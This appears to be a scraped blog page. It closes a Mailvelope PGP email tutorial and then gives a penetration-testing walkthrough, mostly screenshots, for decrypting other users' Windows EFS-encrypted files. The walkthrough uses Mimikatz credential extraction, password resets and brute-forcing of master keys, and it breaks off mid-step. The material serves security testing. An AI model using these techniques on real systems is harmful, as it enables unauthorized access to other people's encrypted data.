<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBBeR7r-1WblQQhydwDdkcnS2dVVjNlqXcoDrYi9oXuIN5lWO4GohG2eHkdZ2cX71B6-ChxA_bZv4UGye6SLwYfFibNrJdQOTL5FUQ8tvxJgqlE_KAODDVvNJhKpVf-al1psE8Gg7ggUX5/s1600/PGP+working.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="303" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBBeR7r-1WblQQhydwDdkcnS2dVVjNlqXcoDrYi9oXuIN5lWO4GohG2eHkdZ2cX71B6-ChxA_bZv4UGye6SLwYfFibNrJdQOTL5FUQ8tvxJgqlE_KAODDVvNJhKpVf-al1psE8Gg7ggUX5/s400/PGP+working.PNG" width="400" /></a></div>
<br />
<b><u>Steps :</u></b><br />
<br />
1. Generate public and private keys with Mailvelope<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhltPNwngu5-29fmSuEAb9RxDlsVByP9-ANMN8fcJeP9iDogeB9OLn7c__wvdJBtdxsU_fJo2uKk46x1E7sCf6gGMlnPNBHIKXkm9LEvDLWz4fSPqMwvvEk2osPTfdm3_NMd7LZ49pJJkvV/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhltPNwngu5-29fmSuEAb9RxDlsVByP9-ANMN8fcJeP9iDogeB9OLn7c__wvdJBtdxsU_fJo2uKk46x1E7sCf6gGMlnPNBHIKXkm9LEvDLWz4fSPqMwvvEk2osPTfdm3_NMd7LZ49pJJkvV/s400/1.PNG" width="400" /></a></div>
<br />
2. View your public and private keys<br />
<div>
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0fk8eLVnsmTmKbTGpcuJ5DymJJfUp3ccHatgw61ThjA7_TngMnH9FLxIgAoIJdrrGwKUVXPRLh_-Cve6o1C0pgOd-TiBg0aUBRlggCAGzKTGu4wjbiLinDfJ7V6cD9TgysZMHEUG-1Li2/s1600/Display+Keys.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0fk8eLVnsmTmKbTGpcuJ5DymJJfUp3ccHatgw61ThjA7_TngMnH9FLxIgAoIJdrrGwKUVXPRLh_-Cve6o1C0pgOd-TiBg0aUBRlggCAGzKTGu4wjbiLinDfJ7V6cD9TgysZMHEUG-1Li2/s400/Display+Keys.PNG" width="400" /></a></div>
<br />
3. Now you need to import your friend's public key so that you can encrypt a confidential message and send it to him<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnc5CbKN1cVDUOwWz_o3T8SkATYsAFkD51pbE-qAXyZ1uPyUH5dB7XAOjphwDps3wky3jvB1AbIuAdyNOycn_bTJGTjJ72cvnpnmvsaT73J805OGzJfOhej3KRqbgXRMCcu0cJ1eXLGCV/s1600/import.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnc5CbKN1cVDUOwWz_o3T8SkATYsAFkD51pbE-qAXyZ1uPyUH5dB7XAOjphwDps3wky3jvB1AbIuAdyNOycn_bTJGTjJ72cvnpnmvsaT73J805OGzJfOhej3KRqbgXRMCcu0cJ1eXLGCV/s400/import.PNG" width="400" /></a></div>
<br />
4. Now you can compose a message and encrypt it with your friend's public key<br />
You just need to enter the recipient whose public key you imported in the previous step.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6sVzZ5LQ7xgWkx_dOFcrdaRjwVa6dIBYFr7V02M1wi3qn_NnkfUvwmS43bRIggDpgFgxk0k2PlRrjor1oSYcQ9ofTJE2t0Gu7ebGcVYMFgOY_Nu55P-4tdMwFn0kIFeQ7DzaUOZbJ0Gnr/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6sVzZ5LQ7xgWkx_dOFcrdaRjwVa6dIBYFr7V02M1wi3qn_NnkfUvwmS43bRIggDpgFgxk0k2PlRrjor1oSYcQ9ofTJE2t0Gu7ebGcVYMFgOY_Nu55P-4tdMwFn0kIFeQ7DzaUOZbJ0Gnr/s400/4.PNG" width="400" /></a></div>
<br />
5. Even if another person intercepts this message, he will see only the contents below<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-TSnAhm9DiaNKBqKQDHo0WIbTaHZl3fbTK4ScRK8CD4aFy4GFoPEGfAI0_lKVwN5aCRXucMoHfPrAtbH0L5DErANewYVDiyJ5uOdwq7eru3Nc6u-tFDBoJ9M9HdalJDyhYY2wv39HgieC/s1600/6.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-TSnAhm9DiaNKBqKQDHo0WIbTaHZl3fbTK4ScRK8CD4aFy4GFoPEGfAI0_lKVwN5aCRXucMoHfPrAtbH0L5DErANewYVDiyJ5uOdwq7eru3Nc6u-tFDBoJ9M9HdalJDyhYY2wv39HgieC/s400/6.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
6. Now when your friend opens the message, he will see the Mailvelope option below for decrypting it</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Your friend will enter passphrase for his private key</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Ern2aM_Nr8GmS7OuR9LxDJTZb0YZOX5x1YyYGHz9VjuJJoCefGgrk2Zzx8JgYkTdZsGYXzfHjdwLmhqDgZo5xTZbP0yxvbaD_MeLO3ymiIO64lzMGGQxqQc40yWMcZ18fvnYQuoih7XP/s1600/8.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Ern2aM_Nr8GmS7OuR9LxDJTZb0YZOX5x1YyYGHz9VjuJJoCefGgrk2Zzx8JgYkTdZsGYXzfHjdwLmhqDgZo5xTZbP0yxvbaD_MeLO3ymiIO64lzMGGQxqQc40yWMcZ18fvnYQuoih7XP/s400/8.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
7. That's it! Your friend has decrypted your message with his private key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCxAgvOZQdqsu9djTrpbhPDaCutsk_3wdVY5MK8yVFpv5p0k3-sWE1tSuaKdTLs5Pkr4OjlbMnjnYfM1AdAt0vMk8RU-giKG4FS_iHMe9C_AnA2BEE3HsO3NkKC_UITW2_XI3f7rRmRhk/s1600/9.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCxAgvOZQdqsu9djTrpbhPDaCutsk_3wdVY5MK8yVFpv5p0k3-sWE1tSuaKdTLs5Pkr4OjlbMnjnYfM1AdAt0vMk8RU-giKG4FS_iHMe9C_AnA2BEE3HsO3NkKC_UITW2_XI3f7rRmRhk/s400/9.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
Hope this helps!<br />
<br />
<br />
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-59097885309925713802017-01-17T10:28:00.000-08:002017-01-17T12:22:15.171-08:00Decrypting EFS encrypted Files<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I recently came across a scenario involving decryption of EFS (Encrypted File System) encrypted files. Encrypted File System (EFS) is a Microsoft Windows feature for encrypting files and folders on NTFS drives.<br />
<br />
<b>How to encrypt a file?</b><br />
It's simple, just follow the steps below:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-oC53t1HweyX7v3i3iPAaQ4ZwAQEZRERTfeI_x-ypNeiyt7d_48hyphenhyphen1TqHtCX2V8QOJXCPscauhaYj4Pms0mljNEw9eaBuGRF603s0RYFDSs2oNGNn48QIM5xCIJ-zC40Jix9guPg96bb/s1600/e1.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-oC53t1HweyX7v3i3iPAaQ4ZwAQEZRERTfeI_x-ypNeiyt7d_48hyphenhyphen1TqHtCX2V8QOJXCPscauhaYj4Pms0mljNEw9eaBuGRF603s0RYFDSs2oNGNn48QIM5xCIJ-zC40Jix9guPg96bb/s400/e1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Encrypting folder name 'Encrypt' with user 'Administrator'<br />
<br />
<br /></td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjm1WYB11vaV-KQ51t-BDSGtOVkuOYipaCiNKXjvQQrJZHBypdZfDx9EvSowQnVsZrrEAdAVxTgp5OjnZ_BS2VL7lXZTEuUCTSzfpxe1EjnkZflAORJTQd9vhZcjoNiv2juTr4NLQ1gLt6/s1600/e2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjm1WYB11vaV-KQ51t-BDSGtOVkuOYipaCiNKXjvQQrJZHBypdZfDx9EvSowQnVsZrrEAdAVxTgp5OjnZ_BS2VL7lXZTEuUCTSzfpxe1EjnkZflAORJTQd9vhZcjoNiv2juTr4NLQ1gLt6/s400/e2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Attempt to access file with user 'admin'</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now it's clear that only the user who encrypted the file can decrypt it!<br />
<br />
In your penetration testing, you must get administrator-level access to the system to decrypt EFS files.<br />
<br />
<br />
Possible ways:<br />
<br />
<b><u>Step 1 </u></b>: Using the '<b>Cipher</b>' command in Windows, you can encrypt / decrypt files, view encrypted file information and use it further for your attacks. I executed the command below as user 'admin', which is an administrator account on the system, and found that the files are encrypted by the user named 'Administrator' - that's what is important to us!<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXyOjofKB7zx70qBxg-E0jT6KbnCpLmfOpek8TajWIBEvGLXanZ9iGYrv3-OaNURO6_uMEkR1o_4CbINgnhZNkFTJUIU2oiP7eeLiA8VcYVflc2NbNXlzQ2pWLkHizDL9IXaD19Odr59iS/s1600/e5+decrypted+only+by+administrator.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXyOjofKB7zx70qBxg-E0jT6KbnCpLmfOpek8TajWIBEvGLXanZ9iGYrv3-OaNURO6_uMEkR1o_4CbINgnhZNkFTJUIU2oiP7eeLiA8VcYVflc2NbNXlzQ2pWLkHizDL9IXaD19Odr59iS/s400/e5+decrypted+only+by+administrator.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Using Cipher command to know information about encrypted file</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u>Case 1 : </u></b> Once you have administrator-level access to the system, I would suggest:<br />
1. Extract system passwords from memory with Mimikatz, and get the password for the account '<b>Administrator</b>' (the user who encrypted the file),<br />
2. Authenticate over SMB and access the EFS encrypted files just like normal files. - <b>This is of course a simple trick.</b><br />
<br />
<br />
<b><u>Case 2 : </u></b>I also tried changing the 'administrator' password from the account 'admin' and it works; you can just log in with your new password and still be able to access EFS encrypted files - <b>So no dependencies even if the password is changed.</b><br />
<b><br /></b>
<u><b>Case 3:</b></u><b> </b>What if, for some reason, you are not able to extract the Windows password from system memory, or system access is configured via smart card? You may not find domain passwords/local administrator passwords in system memory.<br />
<br />
Case 3 becomes a challenge because you don't have a valid password for the account '<b>Administrator</b>', and hence it won't be possible to access EFS encrypted files directly, even via the other administrator user name '<b>admin</b>'.<br />
<br />
<br />
In this case, there are two approaches:<br />
<br />
1. Using 'admin' credentials, attempt to execute the Mimikatz::Crypto commands mentioned below<br />
- https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files<br />
(This is quite a complex process, but you can definitely follow the steps and attempt to recover your keys.)<br />
<br />
2. Using 'admin' credentials, install the tool "Advanced EFS Data Recovery Tool" - it's commercial (https://www.elcomsoft.com/aefsdr.html)<br />
<br />
Using this tool, you will be able to identify EFS encrypted files throughout the disk and find the following two important keys:<br />
- Private Key<br />
- Master Key<br />
<br />
<br />
The private key is encrypted with the master key.<br />
To decrypt this master key, we need to conduct a brute-force attack.<br />
Usually the password is -<br />
- User account password<br />
- Same key as a password<br />
<br />
<br />
<br />
Here are some of the POCs which I simulated in my test environment.<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-xNRL8gL_kdhd3Bdwiby3EX73_t_gI69QVhtHu3NN9bSXQ6jG4L7iQzbLAr6uaEspbedH7omQSQsh3FOvAdcMuYbTpd6urgSjhFCeb65G0b_LM0PJCm73m8LIunjgZMn3h2eZwv3Delu/s1600/0_malicioususer+doest+have+right+to+access+confidential+file+encrypted+by+administrator.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-xNRL8gL_kdhd3Bdwiby3EX73_t_gI69QVhtHu3NN9bSXQ6jG4L7iQzbLAr6uaEspbedH7omQSQsh3FOvAdcMuYbTpd6urgSjhFCeb65G0b_LM0PJCm73m8LIunjgZMn3h2eZwv3Delu/s400/0_malicioususer+doest+have+right+to+access+confidential+file+encrypted+by+administrator.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"Maliciousadmin" user doesn't have access to the encrypted file - created by another user</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjspamQhMrEYGdZfpXl9hG_GQypzRD56bxwQm2S5dVrqIoyPxVSob6xvXvOnkIW5zki8_aWOwDxVj8FeOUYUeKhYbsjvsCRcmh_Z4xSPAVMv4rNHcMLDd-tdpHBU-7-RAkzNuxkGQKX7Xv-/s1600/1_maliciousadmin_installed_EFS+recovery+tool.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjspamQhMrEYGdZfpXl9hG_GQypzRD56bxwQm2S5dVrqIoyPxVSob6xvXvOnkIW5zki8_aWOwDxVj8FeOUYUeKhYbsjvsCRcmh_Z4xSPAVMv4rNHcMLDd-tdpHBU-7-RAkzNuxkGQKX7Xv-/s400/1_maliciousadmin_installed_EFS+recovery+tool.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"Maliciousadmin" installs the EFS recovery tool</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWIaUwkqdvx40-U8oy0T63oeR3GPYD-nkpeiqgqnEMslGl7tPKKbLNOzQJGJm5-haLB2w_uPoNpd-2nWP-EXuDNUP9KyNYW5BhZ2xP7BuFZfp6bAeRpC0gFzVGVCM1NFHLe710L45oWU7D/s1600/2_attacker+dont+know+if+certificate+is+exported+or+not+-+lets+search+the+disk.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWIaUwkqdvx40-U8oy0T63oeR3GPYD-nkpeiqgqnEMslGl7tPKKbLNOzQJGJm5-haLB2w_uPoNpd-2nWP-EXuDNUP9KyNYW5BhZ2xP7BuFZfp6bAeRpC0gFzVGVCM1NFHLe710L45oWU7D/s400/2_attacker+dont+know+if+certificate+is+exported+or+not+-+lets+search+the+disk.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpJDMmvHecgyYAeicM623uFilOqX9CZUV-_8aJ0BR4AeKPeOL7HdIZMBA2Vt83rHduWqwTP4gRE1uYDMg_ple_GvZIqoqR-loBgyFJcBOSt-kzTb8M16Mh4ryvExPuV4kDNsOxX1oxCkXM/s1600/3_attacker_got_list+of+keys+-+private+and+master.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpJDMmvHecgyYAeicM623uFilOqX9CZUV-_8aJ0BR4AeKPeOL7HdIZMBA2Vt83rHduWqwTP4gRE1uYDMg_ple_GvZIqoqR-loBgyFJcBOSt-kzTb8M16Mh4ryvExPuV4kDNsOxX1oxCkXM/s400/3_attacker_got_list+of+keys+-+private+and+master.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Scanning for Private/Master keys and Encrypted files</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAQhVR81fp0LT8gwY7pzdGgf6s7wz62l6q_Mtyk_l4a_LXNdS63cERYwzay38R033J75uaTH3mjSk4DqH0XXcO9yv6LAAMo8grqzwr-dGSlDSU7tk59EhoXbek2urRoeHFx1__oun6fbyT/s1600/4_attacker+has+dictionary+for+bruteforce+attack+on+keys.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAQhVR81fp0LT8gwY7pzdGgf6s7wz62l6q_Mtyk_l4a_LXNdS63cERYwzay38R033J75uaTH3mjSk4DqH0XXcO9yv6LAAMo8grqzwr-dGSlDSU7tk59EhoXbek2urRoeHFx1__oun6fbyT/s400/4_attacker+has+dictionary+for+bruteforce+attack+on+keys.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Launching Bruteforce attack against Master key</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKoFpQms34Kh8n1TSchlLRIaZnBkSO6a-BDjjOZyR_KLPW_LE7FkHYtRRL5Q5U94ezHPBUQgDyF9ladw_OFt1Gwz6titjiCjkx8fjlv2R1IGwaWcQLOL3D156X4DHMdazNMK9aBbQFGzeD/s1600/5_attacker+selected+dictionary+attack+file.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKoFpQms34Kh8n1TSchlLRIaZnBkSO6a-BDjjOZyR_KLPW_LE7FkHYtRRL5Q5U94ezHPBUQgDyF9ladw_OFt1Gwz6titjiCjkx8fjlv2R1IGwaWcQLOL3D156X4DHMdazNMK9aBbQFGzeD/s400/5_attacker+selected+dictionary+attack+file.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Launching Bruteforce attack</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpXYCMhg1QKPNK0g12W9FP3FxlSv56_XQZIktgDHDchJmKUl5gKYjebVEcZwYIkgO5loK2yW05dJX9J1rOh5SdFomI60MaL6J2pyoTj4fuEVPkvLmJ-TT2BsJ-oS5n6y586L2UJI0VHcq/s1600/6_key+decryption+in+process.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpXYCMhg1QKPNK0g12W9FP3FxlSv56_XQZIktgDHDchJmKUl5gKYjebVEcZwYIkgO5loK2yW05dJX9J1rOh5SdFomI60MaL6J2pyoTj4fuEVPkvLmJ-TT2BsJ-oS5n6y586L2UJI0VHcq/s400/6_key+decryption+in+process.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYs5QD6M9x_VUjJbEs9nqufZDtquKvIDx9XYR6MEWWcXLQC-BGOfsNTc17TOXAfCeFb4MlQtzZ3Z09lZO1eRfeYPog8ujDoHAL53zagIq79ZvLIgWiqSnlmAH1ZrPiA5zEco9-NVf-XOv/s1600/7_keys+decrypted.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYs5QD6M9x_VUjJbEs9nqufZDtquKvIDx9XYR6MEWWcXLQC-BGOfsNTc17TOXAfCeFb4MlQtzZ3Z09lZO1eRfeYPog8ujDoHAL53zagIq79ZvLIgWiqSnlmAH1ZrPiA5zEco9-NVf-XOv/s400/7_keys+decrypted.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted Keys - Now can be used for decrypting files</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9XpDxtkHglqJWqOFXRAYS9pt6jAJsNgClOuZsEEQU_ydrA6gpbN9bHckSEtpsMx8UOBMuoNQ_0IGllpjCZaq9Ngy1CfNaj2F51evCrO5AAE3Tm6YakTaarrln94AJIQSTW3C690yW3BM/s1600/8_scan+for+encrypted+file+in+disk.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9XpDxtkHglqJWqOFXRAYS9pt6jAJsNgClOuZsEEQU_ydrA6gpbN9bHckSEtpsMx8UOBMuoNQ_0IGllpjCZaq9Ngy1CfNaj2F51evCrO5AAE3Tm6YakTaarrln94AJIQSTW3C690yW3BM/s400/8_scan+for+encrypted+file+in+disk.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div>
<br /></div>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz1iTrHJvP-i1f0tw7fLrlYzXYYQrTDXUI1E9BTW-ofVE2ieALKQajuvTZ3_YRWAAX61Dr_rzqSOwzxvN1098y_NH2Dmj9PBGBrHOpjI4XVgOZFhQGiV4iE8BSLXYSnD30pqXQaZzUAtu6/s1600/final.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz1iTrHJvP-i1f0tw7fLrlYzXYYQrTDXUI1E9BTW-ofVE2ieALKQajuvTZ3_YRWAAX61Dr_rzqSOwzxvN1098y_NH2Dmj9PBGBrHOpjI4XVgOZFhQGiV4iE8BSLXYSnD30pqXQaZzUAtu6/s400/final.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Files Decrypted with "malicioususer" </td></tr>
</tbody></table>
<br />
<br />
<br />
Hope this was helpful!<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<u>Decrypting the EFS encrypted file the hard way:</u><br />
<br />
<u>Step 1:</u> Log in with user ID "malicioususer".<br />
<br />
<u>Step 2:</u> In our scenario we need to extract the keys for user "admin", who has encrypted the confidential file.<br />
For this, we need to navigate to<br />
<br />
"C:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\&lt;file name&gt;"<br />
<br />
<u>Step 3:</u> Running crypto::system on the above file path generates the public key in a file with the extension .der<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKtS8wsWtH8xGtd1oAGaN1aQxZNAQioJDwDqSO4LPiw2Q4PhPSWyUUMkYwBDc1Gt7DdVrejONB2CQxuP7xOPijzywNbZrPHn68F1wHTb9BdoNDUzABLIK4kw84Dmb6x6j790c9tG6YFaza/s1600/1_access+EFS+certificate+file+location+from+malicioususer.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKtS8wsWtH8xGtd1oAGaN1aQxZNAQioJDwDqSO4LPiw2Q4PhPSWyUUMkYwBDc1Gt7DdVrejONB2CQxuP7xOPijzywNbZrPHn68F1wHTb9BdoNDUzABLIK4kw84Dmb6x6j790c9tG6YFaza/s400/1_access+EFS+certificate+file+location+from+malicioususer.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u>Step 4:</u></b><br />
<b><u><br /></u></b>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
